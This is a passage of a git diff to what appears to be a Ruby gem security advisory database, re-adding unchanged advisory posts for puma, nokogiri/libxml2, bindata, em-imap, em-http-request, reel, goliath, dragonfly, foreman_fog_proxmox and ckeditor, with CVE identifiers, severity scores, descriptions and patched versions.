-    [unsupported versions][3] of Puma.
-
-    [1]: https://en.wikipedia.org/wiki/Slowloris_(computer_security)
-    [2]: https://gist.github.com/nateberkopec/4b3ea5676c0d70cbb37c82d54be25837
-    [3]: https://github.com/puma/puma/security/policy#supported-versions
-  cvss_v3: 7.5
-  patched_versions:
-  - "~> 4.3.8"
-  - ">= 5.3.1"
-  related:
-    cve:
-    - 2019-16770
----
+---
+layout: advisory
+title: 'CVE-2021-29509 (puma): Keepalive Connections Causing Denial Of Service in
+  puma'
+comments: false
+categories:
+- puma
+advisory:
+  gem: puma
+  cve: 2021-29509
+  ghsa: q28m-8xjw-8vr5
+  url: https://github.com/puma/puma/security/advisories/GHSA-q28m-8xjw-8vr5
+  date: 2021-05-11
+  title: Keepalive Connections Causing Denial Of Service in puma
+  description: |
+    ### Impact
+
+    The fix for CVE-2019-16770 was incomplete. The original fix only protected
+    existing connections that had already been accepted from having their
+    requests starved by greedy persistent-connections saturating all threads in
+    the same process. However, new connections may still be starved by greedy
+    persistent-connections saturating all threads in all processes in the
+    cluster.
+
+    A puma server which received more concurrent keep-alive connections than the
+    server had threads in its threadpool would service only a subset of
+    connections, denying service to the unserved connections.
+
+    ### Patches
+
+    This problem has been fixed in puma 4.3.8 and 5.3.1.
+
+    ### Workarounds
+
+    Setting queue_requests false also fixes the issue. This is not advised when
+    using puma without a reverse proxy, such as nginx or apache, because you will
+    open yourself to slow client attacks (e.g. [slowloris][1]).
+
+    The fix is very small. [A git patch is available here][2] for those using
+    [unsupported versions][3] of Puma.
+
+    [1]: https://en.wikipedia.org/wiki/Slowloris_(computer_security)
+    [2]: https://gist.github.com/nateberkopec/4b3ea5676c0d70cbb37c82d54be25837
+    [3]: https://github.com/puma/puma/security/policy#supported-versions
+  cvss_v3: 7.5
+  patched_versions:
+  - "~> 4.3.8"
+  - ">= 5.3.1"
+  related:
+    cve:
+    - 2019-16770
+---
diff --git a/advisories/_posts/2021-05-17-GHSA-7rrm-v45f-jp64.md b/advisories/_posts/2021-05-17-GHSA-7rrm-v45f-jp64.md
index 9a7ca311..0dd06041 100644
--- a/advisories/_posts/2021-05-17-GHSA-7rrm-v45f-jp64.md
+++ b/advisories/_posts/2021-05-17-GHSA-7rrm-v45f-jp64.md
@@ -1,139 +1,139 @@
----
-layout: advisory
-title: 'GHSA-7rrm-v45f-jp64 (nokogiri): Update packaged dependency libxml2 from 2.9.10
-  to 2.9.12'
-comments: false
-categories:
-- nokogiri
-advisory:
-  gem: nokogiri
-  ghsa: 7rrm-v45f-jp64
-  url: https://github.com/sparklemotion/nokogiri/security/advisories/GHSA-7rrm-v45f-jp64
-  date: 2021-05-17
-  title: Update packaged dependency libxml2 from 2.9.10 to 2.9.12
-  description: |
-    ### Summary
-
-    Nokogiri v1.11.4 updates the vendored libxml2 from v2.9.10 to v2.9.12 which addresses:
-
-    - [CVE-2019-20388](https://security.archlinux.org/CVE-2019-20388) (Medium severity)
-    - [CVE-2020-24977](https://security.archlinux.org/CVE-2020-24977) (Medium severity)
-    - [CVE-2021-3517](https://security.archlinux.org/CVE-2021-3517) (Medium severity)
-    - [CVE-2021-3518](https://security.archlinux.org/CVE-2021-3518) (Medium severity)
-    - [CVE-2021-3537](https://security.archlinux.org/CVE-2021-3537) (Low severity)
-    - [CVE-2021-3541](https://security.archlinux.org/CVE-2021-3541) (Low severity)
-
-    Note that two additional CVEs were addressed upstream but are not relevant to this release. [CVE-2021-3516](https://security.archlinux.org/CVE-2021-3516) via `xmllint` is not present in Nokogiri, and [CVE-2020-7595](https://security.archlinux.org/CVE-2020-7595) has been patched in Nokogiri since v1.10.8 (see #1992).
-
-    Please note that this advisory only applies to the CRuby implementation of Nokogiri `< 1.11.4`, and only if the packaged version of libxml2 is being used. If you've overridden defaults at installation time to use system libraries instead of packaged libraries, you should instead pay attention to your distro's `libxml2` release announcements.
-
-
-    ### Mitigation
-
-    Upgrade to Nokogiri `>= 1.11.4`.
-
-
-    ### Impact
-
-    I've done a brief analysis of the published CVEs that are addressed in this upstream release. The libxml2 maintainers have not released a canonical set of CVEs, and so this list is pieced together from secondary sources and may be incomplete.
-
-    All information below is sourced from [security.archlinux.org](https://security.archlinux.org), which appears to have the most up-to-date information as of this analysis.
-
-    #### [CVE-2019-20388](https://security.archlinux.org/CVE-2019-20388)
-
-    - **Severity**: Medium
-    - **Type**: Denial of service
-    - **Description**: A memory leak was found in the xmlSchemaValidateStream function of libxml2. Applications that use this library may be vulnerable to memory not being freed leading to a denial of service.
-    - **Fixed**: https://gitlab.gnome.org/GNOME/libxml2/commit/7ffcd44d7e6c46704f8af0321d9314cd26e0e18a
-
-    Verified that the fix commit first appears in v2.9.11. It seems possible that this issue would be present in programs using Nokogiri < v1.11.4.
-
-
-    #### [CVE-2020-7595](https://security.archlinux.org/CVE-2020-7595)
-
-    - **Severity**: Medium
-    - **Type**: Denial of service
-    - **Description**: xmlStringLenDecodeEntities in parser.c in libxml2 2.9.10 has an infinite loop in a certain end-of-file situation.
-    - **Fixed**: https://gitlab.gnome.org/GNOME/libxml2/commit/0e1a49c8907645d2e155f0d89d4d9895ac5112b5
-
-    This has been patched in Nokogiri since v1.10.8 (see #1992).
-
-
-    #### [CVE-2020-24977](https://security.archlinux.org/CVE-2020-24977)
-
-    - **Severity**: Medium
-    - **Type**: Information disclosure
-    - **Description**: GNOME project libxml2 <= 2.9.10 has a global buffer over-read vulnerability in xmlEncodeEntitiesInternal at libxml2/entities.c.
-    - **Fixed**: https://gitlab.gnome.org/GNOME/libxml2/commit/50f06b3efb638efb0abd95dc62dca05ae67882c2
-
-    Verified that the fix commit first appears in v2.9.11. It seems possible that this issue would be present in programs using Nokogiri < v1.11.4.
-
-
-    #### [CVE-2021-3516](https://security.archlinux.org/CVE-2021-3516)
-
-    - **Severity**: Medium
-    - **Type**: Arbitrary code execution (no remote vector)
-    - **Description**: A use-after-free security issue was found libxml2 before version 2.9.11 when "xmllint --html --push" is used to process crafted files.
-    - **Issue**: https://gitlab.gnome.org/GNOME/libxml2/-/issues/230
-    - **Fixed**: https://gitlab.gnome.org/GNOME/libxml2/-/commit/1358d157d0bd83be1dfe356a69213df9fac0b539
-
-    Verified that the fix commit first appears in v2.9.11. This vector does not exist within Nokogiri, which does not ship `xmllint`.
-
-
-    #### [CVE-2021-3517](https://security.archlinux.org/CVE-2021-3517)
-
-    - **Severity**: Medium
-    - **Type**: Arbitrary code execution
-    - **Description**: A heap-based buffer overflow was found in libxml2 before version 2.9.11 when processing truncated UTF-8 input.
-    - **Issue**: https://gitlab.gnome.org/GNOME/libxml2/-/issues/235
-    - **Fixed**: https://gitlab.gnome.org/GNOME/libxml2/-/commit/bf22713507fe1fc3a2c4b525cf0a88c2dc87a3a2
-
-    Verified that the fix commit first appears in v2.9.11. It seems possible that this issue would be present in programs using Nokogiri < v1.11.4.
-
-
-    #### [CVE-2021-3518](https://security.archlinux.org/CVE-2021-3518)
-
-    - **Severity**: Medium
-    - **Type**: Arbitrary code execution
-    - **Description**: A use-after-free security issue was found in libxml2 before version 2.9.11 in xmlXIncludeDoProcess() in xinclude.c when processing crafted files.
-    - **Issue**: https://gitlab.gnome.org/GNOME/libxml2/-/issues/237
-    - **Fixed**: https://gitlab.gnome.org/GNOME/libxml2/-/commit/1098c30a040e72a4654968547f415be4e4c40fe7
-
-    Verified that the fix commit first appears in v2.9.11. It seems possible that this issue would be present in programs using Nokogiri < v1.11.4.
-
-
-    #### [CVE-2021-3537](https://security.archlinux.org/CVE-2021-3537)
-
-    - **Severity**: Low
-    - **Type**: Denial of service
-    - **Description**: It was found that libxml2 before version 2.9.11 did not propagate errors while parsing XML mixed content, causing a NULL dereference. If an untrusted XML document was parsed in recovery mode and post-validated, the flaw could be used to crash the application.
-    - **Issue**: https://gitlab.gnome.org/GNOME/libxml2/-/issues/243
-    - **Fixed**: https://gitlab.gnome.org/GNOME/libxml2/-/commit/babe75030c7f64a37826bb3342317134568bef61
-
-    Verified that the fix commit first appears in v2.9.11. It seems possible that this issue would be present in programs using Nokogiri < v1.11.4.
-
-
-    #### [CVE-2021-3541](https://security.archlinux.org/CVE-2021-3541)
-
-    - **Severity**: Low
-    - **Type**: Denial of service
-    - **Description**: A security issue was found in libxml2 before version 2.9.11. Exponential entity expansion attack its possible bypassing all existing protection mechanisms and leading to denial of service.
-    - **Fixed**: https://gitlab.gnome.org/GNOME/libxml2/-/commit/8598060bacada41a0eb09d95c97744ff4e428f8e
-
-    Verified that the fix commit first appears in v2.9.11. It seems possible that this issue would be present in programs using Nokogiri < v1.11.4, however Nokogiri's default parse options prevent the attack from succeeding (it is necessary to opt into `DTDLOAD` which is off by default).
-
-    For more details supporting this analysis of this CVE, please visit #2233.
-  cvss_v3: 7.5
-  patched_versions:
-  - ">= 1.11.4"
-  related:
-    cve:
-    - 2019-20388
-    - 2020-24977
-    - 2020-7595
-    - 2021-3516
-    - 2021-3517
-    - 2021-3518
-    - 2021-3537
-    - 2021-3541
----
+---
+layout: advisory
+title: 'GHSA-7rrm-v45f-jp64 (nokogiri): Update packaged dependency libxml2 from 2.9.10
+  to 2.9.12'
+comments: false
+categories:
+- nokogiri
+advisory:
+  gem: nokogiri
+  ghsa: 7rrm-v45f-jp64
+  url: https://github.com/sparklemotion/nokogiri/security/advisories/GHSA-7rrm-v45f-jp64
+  date: 2021-05-17
+  title: Update packaged dependency libxml2 from 2.9.10 to 2.9.12
+  description: |
+    ### Summary
+
+    Nokogiri v1.11.4 updates the vendored libxml2 from v2.9.10 to v2.9.12 which addresses:
+
+    - [CVE-2019-20388](https://security.archlinux.org/CVE-2019-20388) (Medium severity)
+    - [CVE-2020-24977](https://security.archlinux.org/CVE-2020-24977) (Medium severity)
+    - [CVE-2021-3517](https://security.archlinux.org/CVE-2021-3517) (Medium severity)
+    - [CVE-2021-3518](https://security.archlinux.org/CVE-2021-3518) (Medium severity)
+    - [CVE-2021-3537](https://security.archlinux.org/CVE-2021-3537) (Low severity)
+    - [CVE-2021-3541](https://security.archlinux.org/CVE-2021-3541) (Low severity)
+
+    Note that two additional CVEs were addressed upstream but are not relevant to this release. [CVE-2021-3516](https://security.archlinux.org/CVE-2021-3516) via `xmllint` is not present in Nokogiri, and [CVE-2020-7595](https://security.archlinux.org/CVE-2020-7595) has been patched in Nokogiri since v1.10.8 (see #1992).
+
+    Please note that this advisory only applies to the CRuby implementation of Nokogiri `< 1.11.4`, and only if the packaged version of libxml2 is being used. If you've overridden defaults at installation time to use system libraries instead of packaged libraries, you should instead pay attention to your distro's `libxml2` release announcements.
+
+
+    ### Mitigation
+
+    Upgrade to Nokogiri `>= 1.11.4`.
+
+
+    ### Impact
+
+    I've done a brief analysis of the published CVEs that are addressed in this upstream release. The libxml2 maintainers have not released a canonical set of CVEs, and so this list is pieced together from secondary sources and may be incomplete.
+
+    All information below is sourced from [security.archlinux.org](https://security.archlinux.org), which appears to have the most up-to-date information as of this analysis.
+
+    #### [CVE-2019-20388](https://security.archlinux.org/CVE-2019-20388)
+
+    - **Severity**: Medium
+    - **Type**: Denial of service
+    - **Description**: A memory leak was found in the xmlSchemaValidateStream function of libxml2. Applications that use this library may be vulnerable to memory not being freed leading to a denial of service.
+    - **Fixed**: https://gitlab.gnome.org/GNOME/libxml2/commit/7ffcd44d7e6c46704f8af0321d9314cd26e0e18a
+
+    Verified that the fix commit first appears in v2.9.11. It seems possible that this issue would be present in programs using Nokogiri < v1.11.4.
+
+
+    #### [CVE-2020-7595](https://security.archlinux.org/CVE-2020-7595)
+
+    - **Severity**: Medium
+    - **Type**: Denial of service
+    - **Description**: xmlStringLenDecodeEntities in parser.c in libxml2 2.9.10 has an infinite loop in a certain end-of-file situation.
+    - **Fixed**: https://gitlab.gnome.org/GNOME/libxml2/commit/0e1a49c8907645d2e155f0d89d4d9895ac5112b5
+
+    This has been patched in Nokogiri since v1.10.8 (see #1992).
+
+
+    #### [CVE-2020-24977](https://security.archlinux.org/CVE-2020-24977)
+
+    - **Severity**: Medium
+    - **Type**: Information disclosure
+    - **Description**: GNOME project libxml2 <= 2.9.10 has a global buffer over-read vulnerability in xmlEncodeEntitiesInternal at libxml2/entities.c.
+    - **Fixed**: https://gitlab.gnome.org/GNOME/libxml2/commit/50f06b3efb638efb0abd95dc62dca05ae67882c2
+
+    Verified that the fix commit first appears in v2.9.11. It seems possible that this issue would be present in programs using Nokogiri < v1.11.4.
+
+
+    #### [CVE-2021-3516](https://security.archlinux.org/CVE-2021-3516)
+
+    - **Severity**: Medium
+    - **Type**: Arbitrary code execution (no remote vector)
+    - **Description**: A use-after-free security issue was found libxml2 before version 2.9.11 when "xmllint --html --push" is used to process crafted files.
+    - **Issue**: https://gitlab.gnome.org/GNOME/libxml2/-/issues/230
+    - **Fixed**: https://gitlab.gnome.org/GNOME/libxml2/-/commit/1358d157d0bd83be1dfe356a69213df9fac0b539
+
+    Verified that the fix commit first appears in v2.9.11. This vector does not exist within Nokogiri, which does not ship `xmllint`.
+
+
+    #### [CVE-2021-3517](https://security.archlinux.org/CVE-2021-3517)
+
+    - **Severity**: Medium
+    - **Type**: Arbitrary code execution
+    - **Description**: A heap-based buffer overflow was found in libxml2 before version 2.9.11 when processing truncated UTF-8 input.
+    - **Issue**: https://gitlab.gnome.org/GNOME/libxml2/-/issues/235
+    - **Fixed**: https://gitlab.gnome.org/GNOME/libxml2/-/commit/bf22713507fe1fc3a2c4b525cf0a88c2dc87a3a2
+
+    Verified that the fix commit first appears in v2.9.11. It seems possible that this issue would be present in programs using Nokogiri < v1.11.4.
+
+
+    #### [CVE-2021-3518](https://security.archlinux.org/CVE-2021-3518)
+
+    - **Severity**: Medium
+    - **Type**: Arbitrary code execution
+    - **Description**: A use-after-free security issue was found in libxml2 before version 2.9.11 in xmlXIncludeDoProcess() in xinclude.c when processing crafted files.
+    - **Issue**: https://gitlab.gnome.org/GNOME/libxml2/-/issues/237
+    - **Fixed**: https://gitlab.gnome.org/GNOME/libxml2/-/commit/1098c30a040e72a4654968547f415be4e4c40fe7
+
+    Verified that the fix commit first appears in v2.9.11. It seems possible that this issue would be present in programs using Nokogiri < v1.11.4.
+
+
+    #### [CVE-2021-3537](https://security.archlinux.org/CVE-2021-3537)
+
+    - **Severity**: Low
+    - **Type**: Denial of service
+    - **Description**: It was found that libxml2 before version 2.9.11 did not propagate errors while parsing XML mixed content, causing a NULL dereference. If an untrusted XML document was parsed in recovery mode and post-validated, the flaw could be used to crash the application.
+    - **Issue**: https://gitlab.gnome.org/GNOME/libxml2/-/issues/243
+    - **Fixed**: https://gitlab.gnome.org/GNOME/libxml2/-/commit/babe75030c7f64a37826bb3342317134568bef61
+
+    Verified that the fix commit first appears in v2.9.11. It seems possible that this issue would be present in programs using Nokogiri < v1.11.4.
+
+
+    #### [CVE-2021-3541](https://security.archlinux.org/CVE-2021-3541)
+
+    - **Severity**: Low
+    - **Type**: Denial of service
+    - **Description**: A security issue was found in libxml2 before version 2.9.11. Exponential entity expansion attack its possible bypassing all existing protection mechanisms and leading to denial of service.
+    - **Fixed**: https://gitlab.gnome.org/GNOME/libxml2/-/commit/8598060bacada41a0eb09d95c97744ff4e428f8e
+
+    Verified that the fix commit first appears in v2.9.11. It seems possible that this issue would be present in programs using Nokogiri < v1.11.4, however Nokogiri's default parse options prevent the attack from succeeding (it is necessary to opt into `DTDLOAD` which is off by default).
+
+    For more details supporting this analysis of this CVE, please visit #2233.
+  cvss_v3: 7.5
+  patched_versions:
+  - ">= 1.11.4"
+  related:
+    cve:
+    - 2019-20388
+    - 2020-24977
+    - 2020-7595
+    - 2021-3516
+    - 2021-3517
+    - 2021-3518
+    - 2021-3537
+    - 2021-3541
+---
diff --git a/advisories/_posts/2021-05-18-CVE-2021-32823.md b/advisories/_posts/2021-05-18-CVE-2021-32823.md
index b13ac002..c445509a 100644
--- a/advisories/_posts/2021-05-18-CVE-2021-32823.md
+++ b/advisories/_posts/2021-05-18-CVE-2021-32823.md
@@ -1,24 +1,24 @@
----
-layout: advisory
-title: 'CVE-2021-32823 (bindata): Potential Denial-of-Service in bindata'
-comments: false
-categories:
-- bindata
-advisory:
-  gem: bindata
-  cve: 2021-32823
-  ghsa: hj56-84jw-67h6
-  url: https://github.com/rubysec/ruby-advisory-db/issues/476
-  date: 2021-05-18
-  title: Potential Denial-of-Service in bindata
-  description: |
-    In bindata before version 2.4.10, there is a potential denial-of-service
-    vulnerability. In affected versions, it is very slow for certain classes in BinData
-    to be created. For example BinData::Bit100000, BinData::Bit100001, BinData::Bit100002,
-    BinData::Bit<N>. In combination with `<user_input>.constantize` there is a potential
-    for a CPU-based DoS. In version 2.4.10, bindata improved the creation time of Bits
-    and Integers.
-  cvss_v3: 3.7
-  patched_versions:
-  - ">= 2.4.10"
----
+---
+layout: advisory
+title: 'CVE-2021-32823 (bindata): Potential Denial-of-Service in bindata'
+comments: false
+categories:
+- bindata
+advisory:
+  gem: bindata
+  cve: 2021-32823
+  ghsa: hj56-84jw-67h6
+  url: https://github.com/rubysec/ruby-advisory-db/issues/476
+  date: 2021-05-18
+  title: Potential Denial-of-Service in bindata
+  description: |
+    In bindata before version 2.4.10, there is a potential denial-of-service
+    vulnerability. In affected versions, it is very slow for certain classes in BinData
+    to be created. For example BinData::Bit100000, BinData::Bit100001, BinData::Bit100002,
+    BinData::Bit<N>. In combination with `<user_input>.constantize` there is a potential
+    for a CPU-based DoS. In version 2.4.10, bindata improved the creation time of Bits
+    and Integers.
+  cvss_v3: 3.7
+  patched_versions:
+  - ">= 2.4.10"
+---
diff --git a/advisories/_posts/2021-05-24-CVE-2020-13163.md b/advisories/_posts/2021-05-24-CVE-2020-13163.md
index 3b48ec55..e43c830b 100644
--- a/advisories/_posts/2021-05-24-CVE-2020-13163.md
+++ b/advisories/_posts/2021-05-24-CVE-2020-13163.md
@@ -1,19 +1,19 @@
----
-layout: advisory
-title: 'CVE-2020-13163 (em-imap): Improper certificate validation in em-imap'
-comments: false
-categories:
-- em-imap
-advisory:
-  gem: em-imap
-  cve: 2020-13163
-  ghsa: 4f68-49qq-h392
-  url: https://github.com/advisories/GHSA-4f68-49qq-h392
-  date: 2021-05-24
-  title: Improper certificate validation in em-imap
-  description: |
-    em-imap 0.5 and earlier use the library eventmachine in an insecure way
-    that allows an attacker to perform a man-in-the-middle attack against users of the
-    library. The hostname in a TLS server certificate is not verified.
-  cvss_v3: 7.4
----
+---
+layout: advisory
+title: 'CVE-2020-13163 (em-imap): Improper certificate validation in em-imap'
+comments: false
+categories:
+- em-imap
+advisory:
+  gem: em-imap
+  cve: 2020-13163
+  ghsa: 4f68-49qq-h392
+  url: https://github.com/advisories/GHSA-4f68-49qq-h392
+  date: 2021-05-24
+  title: Improper certificate validation in em-imap
+  description: |
+    em-imap 0.5 and earlier use the library eventmachine in an insecure way
+    that allows an attacker to perform a man-in-the-middle attack against users of the
+    library. The hostname in a TLS server certificate is not verified.
+  cvss_v3: 7.4
+---
diff --git a/advisories/_posts/2021-05-24-CVE-2020-13482.md b/advisories/_posts/2021-05-24-CVE-2020-13482.md
index d4900db9..029179ba 100644
--- a/advisories/_posts/2021-05-24-CVE-2020-13482.md
+++ b/advisories/_posts/2021-05-24-CVE-2020-13482.md
@@ -1,21 +1,21 @@
----
-layout: advisory
-title: 'CVE-2020-13482 (em-http-request): Improper Certificate Validation in EM-HTTP-Request'
-comments: false
-categories:
-- em-http-request
-advisory:
-  gem: em-http-request
-  cve: 2020-13482
-  ghsa: q27f-v3r6-9v77
-  url: https://github.com/advisories/GHSA-q27f-v3r6-9v77
-  date: 2021-05-24
-  title: Improper Certificate Validation in EM-HTTP-Request
-  description: |
-    EM-HTTP-Request 1.1.5 uses the library eventmachine in an insecure way
-    that allows an attacker to perform a man-in-the-middle attack against users of the
-    library. The hostname in a TLS server certificate is not verified.
-  cvss_v3: 7.4
-  patched_versions:
-  - ">= 1.1.6"
----
+---
+layout: advisory
+title: 'CVE-2020-13482 (em-http-request): Improper Certificate Validation in EM-HTTP-Request'
+comments: false
+categories:
+- em-http-request
+advisory:
+  gem: em-http-request
+  cve: 2020-13482
+  ghsa: q27f-v3r6-9v77
+  url: https://github.com/advisories/GHSA-q27f-v3r6-9v77
+  date: 2021-05-24
+  title: Improper Certificate Validation in EM-HTTP-Request
+  description: |
+    EM-HTTP-Request 1.1.5 uses the library eventmachine in an insecure way
+    that allows an attacker to perform a man-in-the-middle attack against users of the
+    library. The hostname in a TLS server certificate is not verified.
+  cvss_v3: 7.4
+  patched_versions:
+  - ">= 1.1.6"
+---
diff --git a/advisories/_posts/2021-05-24-CVE-2020-7659.md b/advisories/_posts/2021-05-24-CVE-2020-7659.md
index 6971a733..5460fc19 100644
--- a/advisories/_posts/2021-05-24-CVE-2020-7659.md
+++ b/advisories/_posts/2021-05-24-CVE-2020-7659.md
@@ -1,22 +1,22 @@
----
-layout: advisory
-title: 'CVE-2020-7659 (reel): HTTP Request Smuggling in reel'
-comments: false
-categories:
-- reel
-advisory:
-  gem: reel
-  cve: 2020-7659
-  ghsa: x3v4-pxvm-63j8
-  url: https://github.com/advisories/GHSA-x3v4-pxvm-63j8
-  date: 2021-05-24
-  title: HTTP Request Smuggling in reel
-  description: |
-    reel through 0.6.1 allows Request Smuggling attacks due to incorrect
-    Content-Length and Transfer encoding header parsing. It is possible to conduct HTTP
-    request smuggling attacks by sending the Content-Length header twice. Furthermore,
-    invalid Transfer Encoding headers were found to be parsed as valid which could be
-    leveraged for TECL smuggling attacks. Note, This project is deprecated, and is not
-    maintained any more.
-  cvss_v3: 7.5
----
+---
+layout: advisory
+title: 'CVE-2020-7659 (reel): HTTP Request Smuggling in reel'
+comments: false
+categories:
+- reel
+advisory:
+  gem: reel
+  cve: 2020-7659
+  ghsa: x3v4-pxvm-63j8
+  url: https://github.com/advisories/GHSA-x3v4-pxvm-63j8
+  date: 2021-05-24
+  title: HTTP Request Smuggling in reel
+  description: |
+    reel through 0.6.1 allows Request Smuggling attacks due to incorrect
+    Content-Length and Transfer encoding header parsing. It is possible to conduct HTTP
+    request smuggling attacks by sending the Content-Length header twice. Furthermore,
+    invalid Transfer Encoding headers were found to be parsed as valid which could be
+    leveraged for TECL smuggling attacks. Note, This project is deprecated, and is not
+    maintained any more.
+  cvss_v3: 7.5
+---
diff --git a/advisories/_posts/2021-05-24-CVE-2020-7671.md b/advisories/_posts/2021-05-24-CVE-2020-7671.md
index 46b7c79c..07df5304 100644
--- a/advisories/_posts/2021-05-24-CVE-2020-7671.md
+++ b/advisories/_posts/2021-05-24-CVE-2020-7671.md
@@ -1,21 +1,21 @@
----
-layout: advisory
-title: 'CVE-2020-7671 (goliath): HTTP Request Smuggling in goliath'
-comments: false
-categories:
-- goliath
-advisory:
-  gem: goliath
-  cve: 2020-7671
-  ghsa: 3892-2r52-p65m
-  url: https://github.com/advisories/GHSA-3892-2r52-p65m
-  date: 2021-05-24
-  title: HTTP Request Smuggling in goliath
-  description: |
-    goliath through 1.0.6 allows request smuggling attacks where goliath
-    is used as a backend and a frontend proxy also being vulnerable. It is possible
-    to conduct HTTP request smuggling attacks by sending the Content-Length header twice.
-    Furthermore, invalid Transfer Encoding headers were found to be parsed as valid
-    which could be leveraged for TE:CL smuggling attacks.
-  cvss_v3: 7.5
----
+---
+layout: advisory
+title: 'CVE-2020-7671 (goliath): HTTP Request Smuggling in goliath'
+comments: false
+categories:
+- goliath
+advisory:
+  gem: goliath
+  cve: 2020-7671
+  ghsa: 3892-2r52-p65m
+  url: https://github.com/advisories/GHSA-3892-2r52-p65m
+  date: 2021-05-24
+  title: HTTP Request Smuggling in goliath
+  description: |
+    goliath through 1.0.6 allows request smuggling attacks where goliath
+    is used as a backend and a frontend proxy also being vulnerable. It is possible
+    to conduct HTTP request smuggling attacks by sending the Content-Length header twice.
+    Furthermore, invalid Transfer Encoding headers were found to be parsed as valid
+    which could be leveraged for TE:CL smuggling attacks.
+  cvss_v3: 7.5
+---
diff --git a/advisories/_posts/2021-06-02-CVE-2021-33564.md b/advisories/_posts/2021-06-02-CVE-2021-33564.md
index a908e2b8..e882dba4 100644
--- a/advisories/_posts/2021-06-02-CVE-2021-33564.md
+++ b/advisories/_posts/2021-06-02-CVE-2021-33564.md
@@ -1,23 +1,23 @@
----
-layout: advisory
-title: 'CVE-2021-33564 (dragonfly): Remote code execution in Dragonfly'
-comments: false
-categories:
-- dragonfly
-advisory:
-  gem: dragonfly
-  cve: 2021-33564
-  ghsa: j858-xp5v-f8xx
-  url: https://github.com/advisories/GHSA-j858-xp5v-f8xx
-  date: 2021-06-02
-  title: Remote code execution in Dragonfly
-  description: |
-    An argument injection vulnerability in the Dragonfly gem before 1.4.0
-    for Ruby allows remote attackers to read and write to arbitrary files via a crafted
-    URL when the verify_url option is disabled. This may lead to code execution. The
-    problem occurs because the generate and process features mishandle use of the ImageMagick
-    convert utility.
-  cvss_v3: 9.8
-  patched_versions:
-  - ">= 1.4.0"
----
+---
+layout: advisory
+title: 'CVE-2021-33564 (dragonfly): Remote code execution in Dragonfly'
+comments: false
+categories:
+- dragonfly
+advisory:
+  gem: dragonfly
+  cve: 2021-33564
+  ghsa: j858-xp5v-f8xx
+  url: https://github.com/advisories/GHSA-j858-xp5v-f8xx
+  date: 2021-06-02
+  title: Remote code execution in Dragonfly
+  description: |
+    An argument injection vulnerability in the Dragonfly gem before 1.4.0
+    for Ruby allows remote attackers to read and write to arbitrary files via a crafted
+    URL when the verify_url option is disabled. This may lead to code execution. The
+    problem occurs because the generate and process features mishandle use of the ImageMagick
+    convert utility.
+  cvss_v3: 9.8
+  patched_versions:
+  - ">= 1.4.0"
+---
diff --git a/advisories/_posts/2021-06-10-CVE-2021-20259.md b/advisories/_posts/2021-06-10-CVE-2021-20259.md
index 552c461f..ce5b5b4b 100644
--- a/advisories/_posts/2021-06-10-CVE-2021-20259.md
+++ b/advisories/_posts/2021-06-10-CVE-2021-20259.md
@@ -1,24 +1,24 @@
----
-layout: advisory
-title: 'CVE-2021-20259 (foreman_fog_proxmox): Exposure of Sensitive Information to
-  an Unauthorized Actor in foreman_fog_proxmox'
-comments: false
-categories:
-- foreman_fog_proxmox
-advisory:
-  gem: foreman_fog_proxmox
-  cve: 2021-20259
-  ghsa: f2rp-4rv7-fc95
-  url: https://github.com/advisories/GHSA-f2rp-4rv7-fc95
-  date: 2021-06-10
-  title: Exposure of Sensitive Information to an Unauthorized Actor in foreman_fog_proxmox
-  description: |
-    A flaw was found in the Foreman project. The Proxmox compute resource
-    exposes the password through the API to an authenticated local attacker with view_hosts
-    permission. The highest threat from this vulnerability is to data confidentiality
-    and integrity as well as system availability. Versions before foreman_fog_proxmox
-    0.13.1 are affected
-  cvss_v3: 7.8
-  patched_versions:
-  - ">= 0.13.1"
----
+---
+layout: advisory
+title: 'CVE-2021-20259 (foreman_fog_proxmox): Exposure of Sensitive Information to
+  an Unauthorized Actor in foreman_fog_proxmox'
+comments: false
+categories:
+- foreman_fog_proxmox
+advisory:
+  gem: foreman_fog_proxmox
+  cve: 2021-20259
+  ghsa: f2rp-4rv7-fc95
+  url: https://github.com/advisories/GHSA-f2rp-4rv7-fc95
+  date: 2021-06-10
+  title: Exposure of Sensitive Information to an Unauthorized Actor in foreman_fog_proxmox
+  description: |
+    A flaw was found in the Foreman project. The Proxmox compute resource
+    exposes the password through the API to an authenticated local attacker with view_hosts
+    permission. The highest threat from this vulnerability is to data confidentiality
+    and integrity as well as system availability. Versions before foreman_fog_proxmox
+    0.13.1 are affected
+  cvss_v3: 7.8
+  patched_versions:
+  - ">= 0.13.1"
+---
diff --git a/advisories/_posts/2021-06-21-CVE-2021-33829.md b/advisories/_posts/2021-06-21-CVE-2021-33829.md
index 2053f9a5..f92c0059 100644
--- a/advisories/_posts/2021-06-21-CVE-2021-33829.md
+++ b/advisories/_posts/2021-06-21-CVE-2021-33829.md
@@ -1,36 +1,36 @@
----
-layout: advisory
-title: 'CVE-2021-33829 (ckeditor): ckeditor4 vulnerable to cross-site scripting'
-comments: false
-categories:
-- ckeditor
-advisory:
-  gem: ckeditor
-  cve: 2021-33829
-  ghsa: rgx6-rjj4-c388
-  url: https://ckeditor.com/blog/ckeditor-4.16.1-with-accessibility-enhancements/#improvements-for-comments-in-html-parser
-  title: ckeditor4 vulnerable to cross-site scripting
-  date: 2021-06-21
-  description: |
-    A cross-site scripting (XSS) vulnerability in the HTML Data Processor
-    in CKEditor 4 4.14.0 through 4.16.x before 4.16.1 allows remote attackers to inject
-    executable JavaScript code through a crafted comment because `--!>` is mishandled.
-  cvss_v3: 6.1
-  unaffected_versions:
-  - "< 5.1.1"
-  patched_versions:
-  - ">= 5.1.2"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2021-33829
-    - https://ckeditor.com/blog/ckeditor-4.16.1-with-accessibility-enhancements/#improvements-for-comments-in-html-parser
-    - https://www.npmjs.com/package/ckeditor4
-    - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NYA354LJP47KCVJMTUO77ZCX3ZK42G3T/
-    - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UVOYN2WKDPLKCNILIGEZM236ABQASLGW/
-    - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/WAGNWHFIQAVCP537KFFS2A2GDG66J7XD/
-    - https://www.drupal.org/sa-core-2021-003
-    - https://lists.debian.org/debian-lts-announce/2021/11/msg00007.html
-    - https://github.com/FriendsOfPHP/security-advisories/blob/master/drupal/core/CVE-2021-33829.yaml
-    - https://github.com/FriendsOfPHP/security-advisories/blob/master/drupal/drupal/CVE-2021-33829.yaml
-    - https://github.com/advisories/GHSA-rgx6-rjj4-c388
----
+---
+layout: advisory
